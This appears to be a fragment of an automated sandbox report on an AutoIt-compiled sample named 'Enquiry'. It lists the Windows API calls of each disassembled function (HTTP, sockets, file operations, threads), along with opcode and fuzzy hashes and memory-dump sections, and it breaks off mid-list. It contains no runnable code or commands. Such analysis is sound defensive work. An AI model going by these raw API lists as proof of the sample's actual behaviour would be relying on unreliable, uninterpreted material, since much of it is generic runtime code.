                            • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                            • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                            • String ID:
                            • API String ID: 1291720006-3916222277
                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                            • IsMenu.USER32(?), ref: 0045FC5F
                            • CreatePopupMenu.USER32 ref: 0045FC97
                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                            • String ID: 0$2
                            • API String ID: 93392585-3793063076
                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                            APIs
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                            • VariantClear.OLEAUT32(?), ref: 00435320
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                            • VariantClear.OLEAUT32(?), ref: 004353B3
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                            • String ID: crts
                            • API String ID: 586820018-3724388283
                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                            • _wcscat.LIBCMT ref: 0044BCAF
                            • _wcslen.LIBCMT ref: 0044BCBB
                            • _wcslen.LIBCMT ref: 0044BCD1
                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                            • String ID: \*.*
                            • API String ID: 2326526234-1173974218
                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                            APIs
                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                            • _wcslen.LIBCMT ref: 004335F2
                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                            • GetLastError.KERNEL32 ref: 0043362B
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                            • _wcsrchr.LIBCMT ref: 00433666
                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                            • String ID: \
                            • API String ID: 321622961-2967466578
                            • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                            • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                            • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                            • LoadStringW.USER32(00000000), ref: 00434060
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                            • LoadStringW.USER32(00000000), ref: 00434078
                            • _wprintf.LIBCMT ref: 004340A1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                            • __lock.LIBCMT ref: 00417981
                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                            • __lock.LIBCMT ref: 004179A2
                            • ___addlocaleref.LIBCMT ref: 004179C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$pI
                            • API String ID: 637971194-197072765
                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove$_malloc
                            • String ID:
                            • API String ID: 1938898002-0
                            • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                            • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            • String ID:
                            • API String ID: 3771399671-0
                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                            • _memmove.LIBCMT ref: 0044B555
                            • _memmove.LIBCMT ref: 0044B578
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                            • String ID:
                            • API String ID: 2737351978-0
                            • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                            • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                            • __calloc_crt.LIBCMT ref: 00415246
                            • __getptd.LIBCMT ref: 00415253
                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                            • _free.LIBCMT ref: 0041529E
                            • __dosmaperr.LIBCMT ref: 004152A9
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 3638380555-0
                            • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                            • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Copy$ClearErrorInitLast
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 3207048006-625585964
                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                            • gethostbyname.WSOCK32(?), ref: 004655A6
                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                            • _memmove.LIBCMT ref: 004656CA
                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                            • WSACleanup.WSOCK32 ref: 00465762
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                            • String ID:
                            • API String ID: 2945290962-0
                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                            APIs
                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
